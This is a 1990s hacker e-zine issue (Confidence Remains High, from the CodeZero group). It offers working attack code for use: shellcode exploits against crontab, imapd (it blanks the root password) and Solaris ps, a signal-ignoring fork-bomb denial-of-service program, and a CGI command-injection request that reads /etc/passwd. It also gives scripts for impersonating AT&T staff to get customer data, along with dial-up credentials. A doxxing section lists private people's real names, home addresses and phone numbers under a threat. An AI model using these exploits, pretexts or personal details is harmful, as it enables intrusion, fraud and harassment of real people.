Backdoors Revised..................................: Blk-Majik 7. One Last Thing About The Infamous pHf Technique....: so1o -----=> Section E : World News. 1. Some History.......................................: nobody 2. [GUNNAR] and MadSeason and sIn.....................: so1o 3. "Welcome to the [D]epartment of [O]wned [E]nergy"..: so1o ------=> Section F : Projects. 1. The CodeZero Remote Attack Kit Version 1.00 *FiNAL*: so1o -----=> Section G : The End. (+ Personal Column) =============================================================================== ==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]== =============================================================================== 1. Confidence Remains High Issue 3 : Tetsu Khan Because we just cannot keep the payments for www.codez.com up, and the server keeps going up and down and up and down, Confidence Remains High and CodeZero tools will soon be available at the following sites : http://insecurity.insecurity.org/codez/ [ main site, write it down :) ] http://www.7thsphere.com/hpvac/hacking.html [ CRH distro site ] http://www.r0ot.org [ CRH distro site ] Also available thru FTP... ftp.sekurity.org /users/so1o/ [ Codez distro site ] But we are hoping to set up a new SUPER DOMAIN!@# Expect that within the next issue or two, it will have... CooL o-DaY WaReZ eLeeT VMS hAx0RiN TeXt FiLeZ K-r4d ANSi!@# 2. The Future : so1o The Squirel is your friend, love the Squirel, trust the Squirel... so1o =============================================================================== ==[ EXPLOITS ]=================[ .SECTION B. ]===================[ EXPLOITS ]== =============================================================================== 1. crontab b00gz : unknown /* crontab bug */ #include #include long get_esp(void) { __asm__("movl %esp, %eax\n"); } main(int argc, char **argv) { int i, j, offset; char *bar, *foo; unsigned long *esp_plus = NULL; char mach_codes[] = "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9" "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46" "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51" "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh"; if (argc == 2) offset = atoi(argv[1]); bar = malloc(4096); if (!bar){ fprintf(stderr, "failed to malloc memory\n"); exit(1); } foo = bar; /* copy of original ptr */ esp_plus = (long *)bar; for(i=0; i < 1024 ; i++) *(esp_plus++) = (get_esp() + offset); printf("Using offset (0x%x)\n", (get_esp() + offset)); bar = (char *)esp_plus; for(j=0; j< strlen(mach_codes); j++) *(bar++) = mach_codes[j]; *bar = 0; execl("/usr/bin/crontab", "crontab", foo, NULL); } 2. DoS : superforker.c : Vio This program is fucking evil, I have tested it on a few systems and it just screws them over and sloooOOooows them right down, you cant throw anything at the shell, its pretty sadistic... /* DOS-CoViN. Version .53b, coded by Vio, some ideas are from the bugtraq This program is a beefed up classic denial of service fork()'er :) Compilation: on BSD type of systems do: gcc -DBSD_C -o cvn cvn.c on SysV type of systems do: gcc -DSYSV_C -o cvn cvn.c on my linux, I can compile it with both -DBSD_C and -DSYSV_C if your not sure, you can experiment, or compile it without any -D'efines In the future: SunOS signals ignored. Creation of random symlinks for more gory destruction. Using advanced technology coding to make the hard drive blow up with a loud boom and the console explode causing a nuclear meltdown. Direct All Suggestions And Flames to: Vio NOTE: this program is provided for educational purposes only, its author will not take any responsibility for any stupid things you will decide to do. this has been tested, but not the latest version of it. */ #include #include #include #include #include #include #include #define MAX_FILELEN 100 /* The _actual_ max length */ #define MAX_DIRLEN 10 #define START_DIR "/tmp" /* This can be substituted for any directory */ /* that you have write access to */ void dirs_generator(void); main(int argc, char *argv[]) { int fp; char *buff; char chr; unlink(argv[0]); /* You might wanna ignore all the signals you can ignore.. */ signal(SIGINT, SIG_IGN); /* If any of the signals don't work */ signal(SIGHUP, SIG_IGN); /* on the system you are compiling */ signal(SIGTERM, SIG_IGN); /* them on, just erase that line */ signal(SIGALRM, SIG_IGN); signal(SIGBUS, SIG_IGN); signal(SIGFPE, SIG_IGN); signal(SIGILL, SIG_IGN); signal(SIGIOT, SIG_IGN); signal(SIGPIPE, SIG_IGN); signal(SIGQUIT, SIG_IGN); signal(SIGSEGV, SIG_IGN); signal(SIGTRAP, SIG_IGN); signal(SIGUSR1, SIG_IGN); signal(SIGUSR2, SIG_IGN); #ifdef BSD_C signal(SIGPROF, SIG_IGN); signal(SIGSTOP, SIG_IGN); signal(SIGTSTP, SIG_IGN); signal(SIGTTIN, SIG_IGN); signal(SIGTTOU, SIG_IGN); signal(SIGVTALRM, SIG_IGN); signal(SIGXCPU, SIG_IGN); signal(SIGXFSZ, SIG_IGN); #endif #ifdef SYSV_C signal(SIGPOLL, SIG_IGN); signal(SIGPWR, SIG_IGN); #endif if(fork()) { printf("Now crashing and blowing up this system.. have a nice day\n"); printf("You can safely logout, and let the proggie do its work\n"); printf("or you can stick around and watch lag go from 0 to bitch\n"); printf("in a matter of seconds\n"); printf(" --CoViN \n"); exit(0); } fp=open("/tmp/.foo",O_WRONLY|O_CREAT); if(fork()) { while(1) { fork(); buff = malloc(64000); write(fp, buff, 64000); system("uptime"); } } dirs_generator(); } void dirs_generator(void) { char alph[] = " abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ. "; char fl[MAX_FILELEN]; char dir[MAX_DIRLEN]; int i; int flen; printf("Making dirs..\n"); chdir(START_DIR); fork(); /* For the simplicity of the code.. we also want more dir's from */ fork(); /* the START_DIR */ fork(); while(1) { fork(); flen= (rand() % MAX_FILELEN) - 1; for(i=0; i> Persona-Answer" return 1 } return 0 } # function to answer greetings proc pub_greet {nick uhost hand channel args} { global greets greet_size persona_flag if {$persona_flag} { persona_pause putserv "PRIVMSG $channel :$greets([rand $greet_size]) $nick" putlog "<<$nick>> Persona-Greet" return 1 } return 0 } # function to answer stupid stuff proc pub_stupid {nick uhost hand channel args} { global stupid stupid_size persona_flag if {$persona_flag} { persona_pause putserv "PRIVMSG $channel :$nick , $stupid([rand $stupid_size])" putlog "<<$nick>> Persona-Stupid" return 1 } return 0 } # function to answer goodbyes proc pub_bye {nick uhost hand channel args} { global bye bye_size persona_flag if {$persona_flag} { persona_pause putserv "PRIVMSG $channel :$bye([rand $bye_size]) $nick" putlog "<<$nick>> Persona-Bye" return 1 } return 0 } # misc. functions proc pub_tk3 {nick uhost hand channel args} { global persona_flag if {$persona_flag} { persona_pause putserv "PRIVMSG $channel :$nick, check out tk3play at bleh" putlog "<<$nick>> Persona-tk3play" return 1 } return 0 } # function to enforce minimum pause between responses proc persona_pause {} { global persona_flag persona_wait if {$persona_flag} { persona_off utimer $persona_wait persona_on } return 1 } # functions to turn the personality on and off proc persona_on {} { global persona_flag set persona_flag 1 return 1 } proc persona_off {} { global persona_flag set persona_flag 0 return 1 } putlog "Scorn's persona.tcl is loaded" 4. imapd Remote Exploit : aky / p1 This is the slightly upgraded version of this exploit floating around, there is also another, which is very hard to get, which spawns a shell with root access, I have also heard of European hacker groups coding homemade versions and variants which will this, so for the moment, heres this exploit, imapd usually runs on port 143. This version changes the root passwd field to being blank, so you can su to root without a password. I have heard there are problems and limitations with this, but that ain't my problem.. /* This is the remote exploit of the hole in the imap daemon, for Linux. The instruction code is doing open(), write(), and close() system calls, and it adds a line root::0:0.. at the beggining of /etc/passwd (change to /etc/shadow if needed). The code needs to be self modifying since imapd turns everything to lowercase before it pushes it on the stack. The problem is that it rewrites the first line of passwd/shadow, therefore loosing the root password. I'm sorry, but I don't have time to add in the seek syscall. - Akylonius (aky@galeb.etf.bg.ac.yu) [1997] Modifications made on 5.1.97 to accept command line hostname, with 'h_to_ip' function that resolves it to an ip. - p1 (p1@el8.org) */ #include #include #include #include #include #include #include char *h_to_ip(char *hostname); char *h_to_ip(char *hostname) { struct hostent *h; struct sockaddr_in tmp; struct in_addr in; h = gethostbyname(hostname); if (h==NULL) { perror("Resolving the host. \n"); exit(-1); } memcpy((caddr_t)&tmp.sin_addr.s_addr, h->h_addr, h->h_length); memcpy(&in,&tmp.sin_addr.s_addr,4); return(inet_ntoa(in)); } void banner(void) { system("clear"); printf("\nIMAP Exploit for Linux.\n"); printf("\n\tAuthor: Akylonius (aky@galeb.etf.bg.ac.yu)\n"); printf(" Modifications: p1 (p1@el8.org)\n"); } main(int argc, char **argv) { int fd; struct sockaddr_in sckdaddr; char *hostname; char buf[4092]; int i=8; char realegg[] = "\xeb\x58\x5e" "\x31\xdb\x83\xc3\x08\x83\xc3\x02\x88\x5e\x26" "\x31\xdb\x83\xc3\x23\x83\xc3\x23\x88\x5e\xa8" "\x31\xdb\x83\xc3\x26\x83\xc3\x30\x88\x5e\xc2" "\x31\xc0\x88\x46\x0b\x89\xf3\x83\xc0\x05\x31" "\xc9\x83\xc1\x01\x31\xd2\xcd\x80\x89\xc3\x31" "\xc0\x83\xc0\x04\x31\xd2\x88\x56\x27\x89\xf1" "\x83\xc1\x0c\x83\xc2\x1b\xcd\x80\x31\xc0\x83" "\xc0\x06\xcd\x80\x31\xc0\x83\xc0\x01\xcd\x80" "\xe8\x83\xff\xff\xff" "/etc/passwdxroot::0:0:r00t:/:/bin/bashx"; char *point = realegg; buf[0]='*'; buf[1]=' '; buf[2]='l'; buf[3]='o'; buf[4]='g'; buf[5]='i'; buf[6]='n'; buf[7]=' '; banner(); if (argc<2) { printf("\nUsage: %s \n\n", argv[0]); exit(-1); } hostname=argv[1]; while(i<1034-sizeof(realegg) -1) /* -sizeof(realegg)+1) */ buf[i++]=0x90; while(*point) buf[i++]=*(point++); buf[i++]=0x83; /* ebp */ buf[i++]=0xf3; buf[i++]=0xff; buf[i++]=0xbf; buf[i++]=0x88; /* ret adr */ buf[i++]=0xf8; buf[i++]=0xff; buf[i++]=0xbf; buf[i++]=' '; buf[i++]='b'; buf[i++]='a'; buf[i++]='h'; buf[i++]='\n'; buf[i++]=0x0; if ((fd=socket(AF_INET,SOCK_STREAM,0))<0) perror("Error opening the socket. \n"); sckdaddr.sin_port=htons(143); sckdaddr.sin_family=AF_INET; sckdaddr.sin_addr.s_addr=inet_addr(h_to_ip(hostname)); if (connect(fd,(struct sockaddr *) &sckdaddr, sizeof(sckdaddr)) < 0) perror("Error with connecting. \n"); printf("hmm: \n"); getchar(); write(fd,buf,strlen(buf)+1); printf("hmm: \n"); close(fd); } 5. Solaris 2.5.1 ps Exploit : J. Zbiciak #!/bin/sh # # Exploit for Solaris 2.5.1 /usr/bin/ps # J. Zbiciak, 5/18/97 # # Just copy this into one file, upload it to a system, chmod 755 and # then run it using # change as appropriate CC=gcc # Build the "replacement message" :-) cat > ps_expl.po << E_O_F domain "SUNW_OST_OSCMD" msgid "usage: %s\n%s\n%s\n%s\n%s\n%s\n%s\n" msgstr "\055\013\330\232\254\025\241\156\057\013\332\334\256\025\343\150\220\013\200\016\222\003\240\014\224\032\200\012\234\003\240\024\354\073\277\354\300\043\277\364\334\043\277\370\300\043\277\374\202\020\040\073\221\320\040\010\220\033\300\017\202\02 0\040\001\221\320\040\010" E_O_F msgfmt -o /tmp/foo ps_expl.po # Build the C portion of the exploit cat > ps_expl.c << E_O_F /*****************************************/ /* Exploit for Solaris 2.5.1 /usr/bin/ps */ /* J. Zbiciak, 5/18/97 */ /*****************************************/ #include #include #include #include #define BUF_LENGTH (632) #define EXTRA (256) int main(int argc, char *argv[]) { char buf[BUF_LENGTH + EXTRA]; /* ps will grok this file for the exploit code */ char *envp[]={"NLSPATH=/tmp/foo",0}; u_long *long_p; u_char *char_p; /* This will vary depending on your libc */ u_long proc_link=0xef70ef70; int i; long_p = (u_long *) buf; /* This first loop smashes the target buffer for optargs */ for (i = 0; i < (96) / sizeof(u_long); i++) *long_p++ = 0x10101010; /* At offset 96 is the environ ptr -- be careful not to mess it up */ *long_p++=0xeffffcb0; *long_p++=0xffffffff; /* After that is the _ctype table. Filling with 0x10101010 marks the entire character set as being "uppercase printable". */ for (i = 0; i < (BUF_LENGTH-104) / sizeof(u_long); i++) *long_p++ = 0x10101010; /* build up _iob[0] (Ref: /usr/include/stdio.h, struct FILE) */ *long_p++ = 0xFFFFFFFF; /* num chars in buffer */ *long_p++ = proc_link; /* pointer to chars in buffer */ *long_p++ = proc_link; /* pointer to buffer */ *long_p++ = 0x0501FFFF; /* unbuffered output on stream 1 */ /* Note: "stdin" is marked as an output stream. Don't sweat it. :-) */ /* build up _iob[1] */ *long_p++ = 0xFFFFFFFF; /* num chars in buffer */ *long_p++ = proc_link; /* pointer to chars in buffer */ *long_p++ = proc_link; /* pointer to buffer */ *long_p++ = 0x4201FFFF; /* line-buffered output on stream 1 */ /* build up _iob[2] */ *long_p++ = 0xFFFFFFFF; /* num chars in buffer */ *long_p++ = proc_link; /* pointer to chars in buffer */ *long_p++ = proc_link; /* pointer to buffer */ *long_p++ = 0x4202FFFF; /* line-buffered output on stream 2 */ *long_p =0; /* The following includes the invalid argument '-z' to force the usage msg to appear after the arguments have been parsed. */ execle("/usr/bin/ps", "ps", "-z", "-u", buf, (char *) 0, envp); perror("execle failed"); return 0; } E_O_F # Compile it $CC -o ps_expl ps_expl.c # And off we go! exec ./ps_expl 6. handler CGI Hole : so1o New bug that affects most IRIX systems, heres how you use it... telnet target.machine.com 80 GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=Download HTTP/1.0 =============================================================================== ==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]== =============================================================================== 1. DTMF Decoder : xFli DTMF Decoder plans. ------------------- If you are into bigtime surveillance, or you just have some burning desire to get the phone number of your sisters sexy friend, then you will be interested in this little circuit. Basically, using this, you can use a tape recorder and a pickup coil to record the DTMF tones sent when someone dials a number, or if it is easier to you can wire it up to a phone jack and decode in realtime, and then decode them to get the number dialled. This can cope with speed dialling, but you will need a reasonably good recording to decode successfully. The circuit is simplicity itself, literally only 5 components. I could have included an unreadable ascii circuit diag / pcb layout, but it would have been a waste of time, so the diags are available from http://www.codez.com and other CodeZero sites. The hardware takes the DTMF signal, decodes it and sends it to lpt1, where the binary output of the ic is converted into standard numbers. The simple BASIC program is included. Which is precompiled on http://www.codez.com Component list: ---------------- 1 x SSI202 18 pin Chip 1 x 3.579 MHz quartz crystal 2 x 27n Capacitors 1 x 1M resistor Source: -------- DTMF DECODER SOFTWARE ------------------------------------------ ' Use this to decode the output from the decoder hardware ' Not written by xFli, suggested in an electronics mag. 10 CLS:KEY OFF 20 I=INP(&H279) 30 IF (I AND 128)=128 THEN 30 40 C=0 50 IF (I AND 8)=8 THEN C=C+1 60 IF (I AND 16)=16 THEN C=C+2 70 IF (I AND 32)=32 THEN C=C+4 80 IF (I AND 64)=64 THEN C=C+8 90 IF C=11 THEN PRINT" * ";:GOTO 180 100 IF C=12 THEN PRINT" # ";:GOTO 180 110 IF C=13 THEN PRINT" A ";:GOTO 180 120 IF C=14 THEN PRINT" B ";:GOTO 180 130 IF C=15 THEN PRINT" C ";:GOTO 180 140 IF C=0 THEN PRINT" D ";:GOTO 180 150 IF C=10 THEN PRINT" 0 ";:GOTO 180 160 PRINT C; 170 I=INP(&H279) 180 IF (I AND 128)=0 THEN 180 190 T=TIMER 200 I=INP(&H279) 210 IF (TIMER-T)>5 THEN PRINT:PRINT:GOTO 30 220 IF (I AND 128) = 128 THEN 210 230 GOTO 50 In the magazine, it is advised you use gw-basic, which is included with very very early DOS versions. It may or may not work with qbasic etc. I don't know. These are also for UK tones, maybe they are different in the US. 2. Dealing with directory assistance operators : Qytpo Allright, this information should be made available to everyone who cares to read it. Any information used from this article is to be used at a persons own risk. i will not be held responsible if any of this is used for wrongfull purposes- ( it can, you just have to get really creative ). Well, to start off, the job of the directory assistance operator, is to give out addresses, phone numbers, and area codes, for the information given to them. The operators can search from names, business names, and government names, despite what anyone tells you, an AT&T DIRECTORY ASSISTANCE OPERATOR CAN DO A CNA SEARCH. (Customer name and address) If the particular operator says they cant, then bug them. yell at them. if they dont do it themselves, they will get their supervisor. and if you make it sound really important they can do it. and if all that doesnt work, try to find a naive operator, tell them you are an AT&T administrator, and say, to press (Control+C) to bring up a CNA search on their switch. A CNA search is a very valuable asset, if you cannot find a CNA operator, give a directory assistance operator a whirl, chances are, if you have a brain, and are a decent actor, you can get the listing for the number you give them. Routing. The calls are routed through a large mainframe in each state department How it works: Say you dial, 602-555-1212. that would put you through to an operator ANYWHERE in the United States, where phoenix calls are routed through to. it will not just appear in 602, allthought that is where it is supposed to. If the switches in 602 are full, the call could end up anywhere in the US. When the operator picks up the reciever- (it is actually a headset that beeps). The call is automatically traced to whatever area code they dialed. so if You dialed (602 555 1212). an operator anywhere in the US, would get a listing on their screen, and a default city, in the upper left hand corner [PHOE] (phoenix arizona). [ *note*: depending on the area code, 602 for example, the operator can search the area codes permitted in that area code..] for example, if you dialed 602-555-1212, the operator would be allowed to search in 502 (the other area code in AZ) However, in some area codes, they will make you redial, like LA, or TEXAS, or NEWYORK; they have so many area codes, For example 310 and 210, in LOS ANGELES If you wanted a listing for LOS ANGELES, and dialed 210-555-1212, and wanted a listing for city in los angeles which was 310, they would make you hang up and dial 310-555-1212. (the operator shuld be saying to himself/herself, "no, this kiddie needz to call 310 instead, or i get fired for giving out bad information"...if they have a clue) Sample Call to a D A O for a CNA Search: ( The best way to get info ) ( caller dials 555-1212 in area code ) City please? Yes, this is James Thornton at AT&T the AT&T administrative assistance office. I need you to do a CNA Search for me. I'm sorry sir, we're not permitted to do CNA searches. Yes, I know. May I speak to a supervisor? This is So and So supervisor, how can I help you sir? Yes, this is James Thornton down at the AT&T (also called Excel) office in Florida, we need a CNA search done for a XXX-XXX-XXXX. One moment please. Ok. Ok, I am (or am not) showing a listing for XXX-XXX-XXXX, would you like that listing sir? Yes please, and I would like that verbally. (if you time it just right, you can get the info for free. if yer beige boxing, it doesnt really make a difference tho.) - hang up, say "what" a few times, to make it sound like you didnt get the listing. and hang up before she finishes the second time. she can only bill you while you are on the line, and if she fucks up, you can get away with it with no bill while they read you the number. This method only works for a verbal listing. if yer quick enough. ;) - - - The NPA RULES. - - - NPA dialed : NPAS PERMITTED TO SEARCH IN FROM THE NPA DIALLED -----California---- 213 213 209 408 510 707 916 408 209 510 415 510 707 510 209 408 415 707 916 707 209 415 510 916 714 714 916 209 510 707 -------Texas------- 210 512 915 214 817 903 972 281 409 713 409 281 512 713 817 903 512 210 409 817 915 713 281 409 806 817 915 817 214 409 512 806 903 903 214 409 817 915 210 512 806 817 972 214 817 903 -----New York------ 212 718 914 917 315 518 607 716 516 718 518 315 607 914 607 315 518 716 914 716 315 607 718 212 518 914 914 212 518 607 718 917 (cell) 212 718 914 *note*: all other states can search all NPA's listed in that state. - Qytpo (@#hackers on EFnet) 3. Russian fone #'s (+7 095 XXXxxxx) : CyberLirik Some Interesting ph0ne #'s [07.06.97] Have some real phun with these, they are up-to-date!@# [RUSSiA] +7 095 XXXxxxx ----------------------------------------------------------------------- AT&T Calling Cards Service ----------------------------------------------------------------------- 9740074 Tone System - AT&T Moscow HQ switch to tone mode press 0 to page operator then by pressing "1" ya can record your voice message then by pressing "2" & "3" ya can hear your record :) 7555042 English-speeking AT&T operator 1555042 Also Automate AT&T Calling System is here ( tone mode ) 7555555 Russian-speeking AT&T operator 1555555 No AT&T Tone Machine ! ----------------------------------------------------------------------- Sprintnet Local Dial-Ups 02501 & 03110 DNICs GlobalOne = Sprintnet = Telenet ----------------------------------------------------------------------- 9286344 9600 9280985 9600 9137166 9600 < Only for MAIL 5789119 2400 3428376 9600 real connect 2400 9167373 SprintNet V34-19200 9167272 ??? 9167171 ? 00wait8 RoSprint PPP dialup. ----------------------------------------------------------------------- ROSPAC Local Dial-Ups 02500 DNIC ----------------------------------------------------------------------- 9270003 9600 9563692 9600 9563690 ----------------------------------------------------------------------- Rosnet Dialups 02506 DNIC ----------------------------------------------------------------------- 975-8403 913-3571 921-2103 201-2030 Voice:(095)206-8570,206-8458,206-7238 442-6422 442-8277 442-7022 442-8388 442-7088 442-8577 442-8077 442-6477 Iskra-2: 20-906,33-571 ----------------------------------------------------------------------- IBM net Dial-Up ----------------------------------------------------------------------- 2586420 ----------------------------------------------------------------------- Russia@Online Dial-Ups 28.8Kbps ----------------------------------------------------------------------- 9132376 30 lines 2584120 60 lines 3619999 2584161 Voice phone ! ----------------------------------------------------------------------- InfoNet Euro ----------------------------------------------------------------------- 9150001 28.8 9150005 28.8 2400 temp [unpublished] 2400 temp [unpublished] 2400 temp [unpublished] 2400 temp [unpublished] 2927056 Infonet Euro Voice ! ----------------------------------------------------------------------- Sita Network (AOLGLOBALnet & SCITOR {aka EQUANT} ) ----------------------------------------------------------------------- 9563589 14400 [unpublished] 9676767 24400 9676730 9676731 9676732 9676733 9676734 9676735 9676755 9676759 9676763 9676766 9676784 9562455 SITA voice! phones 9564736 00wait5 pᨭ 業p STB Card. 00wait9 free information service 974 5122 Elvis+,Co Proxy 194.190.195.71. 961 5122 DNS 195.190.195.66. SLIP login: iptest temp 192.168.12.1 PPP login: pptest Password: guest ----------------------------------------------------------------------- CentroNet DialUp www.astro.ru ----------------------------------------------------------------------- 7511704 14400 ----------------------------------------------------------------------- Infotel dialUps [02504] ----------------------------------------------------------------------- 9585475 9580226 9580825 9580575 ----------------------------------------------------------------------- MMTEL DialUPs [02503] ----------------------------------------------------------------------- 3371001 5 lines 2419860 .db 2418340 2461661 ----------------------------------------------------------------------- PTT-Teleport www.ptt.ru ----------------------------------------------------------------------- 946-9383 voice about x.25,28,etc 946-9393 modem PPP ----------------------------------------------------------------------- www.dataforce.net ----------------------------------------------------------------------- 9566749 voice 2889340 ----------------------------------------------------------------------- FaxInfo Demo Tone Voice Line ----------------------------------------------------------------------- 9629424 demo user code : 12345 9759220 Telephone Voice Bulletin Board ----------------------------------------------------------------------- Voice Mail boxes ----------------------------------------------------------------------- 7059285 leave me mail in 80718 box 9253503 Online registration 4 email 9253507 ----------------------------------------------------------------------- Strange #s : ----------------------------------------------------------------------- 2587474 Logon: 2586435 2586411 2586414 30 32 9269199 9500885 9563686 ----------------------------------------------------------------------- Demos 33.8 V34 HST ----------------------------------------------------------------------- 958-19-75 958-19-81 956-62-85 956-62-86 241-05-05 961-32-00 ----------------------------------------------------------------------- www.Cityline.ru V34 ----------------------------------------------------------------------- 2587884 40 lines 9567759 20 2341901 10 2450070 10 2454414 10 9564787 Interport Mailbox ( t0ne ) 9560050 Unknown system ( t0ne ) 9585474 PassWord: _always_ BUSY #s ( unpluged ) 111-11xx 222-2222 980xxxxx .. 999xxxxx ----------------------------------------------------------------------- INTEL PORT : ----------------------------------------------------------------------- 956-4787 Main 434-1565 Registration 202-6934 Demo ----------------------------------------------------------------------- Dial-Ups ----------------------------------------------------------------------- 281-0201 975-0520 (37) 9270003 TYMUSA 956-3692 the same 956-0699 9600 Real Tymnet Voice 9563678 503/9563691 TYM-X25 Sync ----------------------------------------------------------------------- Youth Science Center Linux server ----------------------------------------------------------------------- Data lines: Line 1: 954-0664 (14400, 24h, UUPC only) 2: 954-0058 (14400, 21:00 - 09:00) 3: 954-0914 ( 9600, 21:00 - 09:00) 4: 954-0147 (33600, 24h, PPP only) 5: 954-0144 (33600, 24h, RAS only) 6: 954-0445 (33600, 24h, restricted) Voice Dmitry Ablov 9540012 7473355 ASVT Dial Up Gateway 2 Users: Oleg & Alex 742xxxx Gate to Iskra2 line. Call for 8-097-2nodes 913xxxx Gate to Iskra2 line. Call for 8-097-3nodes 2324626 Comstar Dialup 2329696 9560885 "The Microsoft Network is no longer providing MSN in Russia" ----------------------------------------------------------------------- -=-=-=-=-=-=-=-=-=-= Free 800 Services -=-=-=-=-=-=-=-=-=-=- ----------------------------------------------------------------------- Moscow #s 7473320 Rus MCI Operators in California 7473322 Eng connect me to Customer's Service in Russian 7473321 AT&T Operators in New-York 7473323 7473324 Sprint Global, Arizona, USA 7473325 Orua,Canada 7473326 Otele Code ? 7473327 National Calling Center, UK 28 7473329 Japan 7473356 Sprint Calling Cards 57 7473359 France service 60 7473361 Italian service 7473363 Chili ? service National Russian #s 8-10 800 4977211 - ( AT&T); 8-10 800 4977222 - ( MCI); 8-10 800 4977255 - ( Sprint) ; 8-10 800 4977220 - (MCI ᪮筠 㦡); 8-10 800 4977233 - (Teleglob); 8-10 800 4977266 - ⠭(BT); 8-10 800 4977277 - ⠭( Mercuri); 8-10 800 4977288 - ; 8-10 800 4977181 - ( KDD); 8-10 800 4974358 - ﭤ( Telecom Finland); 8-10 800 4977032 - 죨 (Belgacom, ᯮ짮- 祪); 8-10 800 4977212 - 죨 ( Belgacom, १ - ); 8-10 800 4977039 - ⠫ (Iritel); 8-10 800 4977353 - ૠ ( Telecom Iriland); 8-10 800 4977156 - ; 8-10 800 4977165 - ; 8-10 800 4977141 - . =============================================================================== ==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]== =============================================================================== 1. sIn inf0z part 3 : The CodeZero + Friends sIn are 0fficially property of the CodeZero. ------------------------------------------------------------------------------- Alias : Evil Chick Real Name : Suzette Kimminau Address : 130 105th Ave. S.E. Apt. 218 Bellevue, Wa 98004 USA Telephone : (206)454-7176 Email : evilchic@NWLINK.COM ------------------------------------------------------------------------------- Alias : \\StOrM\\ Real Name : Jason Sloderbeck Address : 5739 N Norton, Kansas City, MO 64119 USA Telephone : (816)453-8722 Email : storm@SINNERZ.COM ------------------------------------------------------------------------------- Alias : JDKane Real Name : Kim Address : 327 E Park Road, Round Lake, IL 60073 USA Telephone : (847)546-9154 Email : ------------------------------------------------------------------------------- Alias : JeNnYGrRl Real Name : Jennifer Chambers Address : Kansas City, MO 61421 USA Telephone : Email : ------------------------------------------------------------------------------- We got more, but not complete, They can run, but they can never hide, http://www.codez.com/inf0z.html 2. The Codez That NASA Use : so1o w0wie, I got myself some eleet NASA system security juarez...And people have leeched them from me, like lame undernet groups with no skill. ::: LaRCSCAN ::: NAIAD ---These Are The *EXACT* Files Taken From The nasatool.zip.gz I have---------- (readme.larcscan) The LaRCSCAN program is a working prototype rather than a finished product, thus requiring a few explanations. SETTING UP ---------- LaRCSCAN is a combination of fifty script and c-language files. (No need to compile the c code, the scripts will do it ). To set up to run LaRCSCAN create a directory LARCSCAN in the users home directory. Copy LARCSCAN.tar into this directory. Do a tar -xf LARCSCAN.tar. This will create a 'project' directory containing all the script and 'C' files. Next create a directory 'LARCSCAN/data' . In this directory you wil create two files- 'hname1' and 'uname2'. These should be plain ascii text files. The first (hname1) will contain a list of all the target machine host names, one name per line. Example: viper machine2 dumbo (These may also use the longer format i.e. 'dumbo.larc.nasa.gov') The second (uname2) should contain a list of standard vendor account names you wish to check. Example: guest tutor 4Dgifts demo demos lp There is an extensive list of these names in the file named 'acctlist'. We normally run 6 to 8 of these each month, rotating through the list. They are used in the 'rsh' attempts and using too many can cause the process to be extremely slow. Before running LaRCSCAN, there are several places code must be changed to reflect the user, host and domain running the scan. The following changes should be make: FILE CURRENT TEXT REPLACEMENT --- ----------- ----------- ftpsc 'jpark@bize' your username@your hostname fptss 'jpark@bize' your username@your hostname getftp.sh 'jpark@bize' your username@your hostname getftpss.sh 'jpark@bize' your username@your hostname ftpsc '#local=larc.nasa.gov' '#local='your complete domain ftpss '#local=larc.nasa.gov' '#local='your complete domain hostsljc '#local=larc.nasa.gov' '#local='your complete domain rshss '#local=larc.nasa.gov' '#local='your complete domain rshsc '#local=larc.nasa.gov' '#local='your complete domain shownlj '#local=larc.nasa.gov' '#local='your complete domain line.c 'strncmp(pl.hdr,"larc",n)' substitute the site portion of your domainname (lerc,arc,jpl,etc) for 'larc' These changes are necessary in order for your results to be accurate. The C code is compiled (by the script files) using cc with the -o (next token is output file) option. If this compiler is not used on the scanning machine, you should be able to substitute the appropriate compiler command and option. Compilation occurs from: exec1.sh exec2.sh rshsc rshss shownlj RUNNING LaRCSCAN ---------------- LaRCSCAN can take quite a while (days) to run to completion, so it is reccommended that it be run in the background mode. We do this either with crontab starting it at a specified time/date or through the use of 'nohup'. The command that starts the process is 'sh tst1.sh' (in the project directory). The necessary subdirectories and files will be created as needed. RESULTS ------- The first report (LARCSCAN/result/result.db) is a summary of the results from each target machine. It starts with the date the scan began and the total number of target hosts. The next line is the column header line, containing the following abbreviations: HTNAME - hostname HUK - host known (is the hostname an active host) TFTP-trivial ftp (is the trivial ftp utility active on this host) FTP-anonymous ftp (is anonymous ftp active on this host) There can several valid responses in this column. No-anonymous ftp is not active Yes_No-anonymous ftp is active but no password file was captured. Yes_Yes-anonymous ftp is active and a password file was captured. ALIAS-were the 'decode' or 'uudecode' aliases present in the aliases file SDM-was the 'wiz' password present in the sendmail.cf file SHADOW-was the captured password file a shadow password file. N/A used when no password file was captured. (This is the only instance where 'Yes' is a desired result) +LINE-Indicates a single '+' on a line by itself in the hosts.equiv file The second report (LARCSCAN/result/result2.db) is a list of all hosts found to have accounts with no password, followed by the unprotected account names. The ACCTS_OFF and OFF columns will be used to represent host.equiv entries that are located off-site and target hosts located off-site. Currently these entries are not valid! The last report (LARCSCAN/result/resultr1.db ) contains a list of all file systems exportable to the world. Any specific questions or problems may be sent via E-mail to j.w.park@larc.nasa.gov. (readme.naiad) The NASIRC Automated Inode Anomaly Detector (NAIAD) --------------------------------------------------- Copyright 1996 Hughes STX Corporation This software was developed by Hughes STX Corporation for the National Aeronautics and Space Administration under contract NAS5-30440. An unlimited license for use within NASA is granted. Hughes STX Corporation makes no representation concerning the suitability of this software for any particular purpose. It is provided "as is" without express or implied warranty of any kind. Author: Fred Blonder NAIAD will traverse a specified directory and all its sub-directories, looking for files meeting certain built-in criteria. If no directory is specified, it starts at the current directory. Its purpose is to find evidence of attempted or actual system tampering. The tests performed cannot easily be performed by existing system commands such as "find". NAIAD is intended to be used in conjunction with such programs and checksumming programs. The tests NAIAD performs are: * Check for file names containing unprintable characters. These are sometimes used to hide illicit programs, or the output from them. They are also frequently created by fumble-fingered users, and are not necessarily a sign of a problem. Optionally, naiad will rename the file to something easier to type on a normal keyboard. * List symbolic links, or just symbolic links to files whose name begins with a period. The exploitation of security 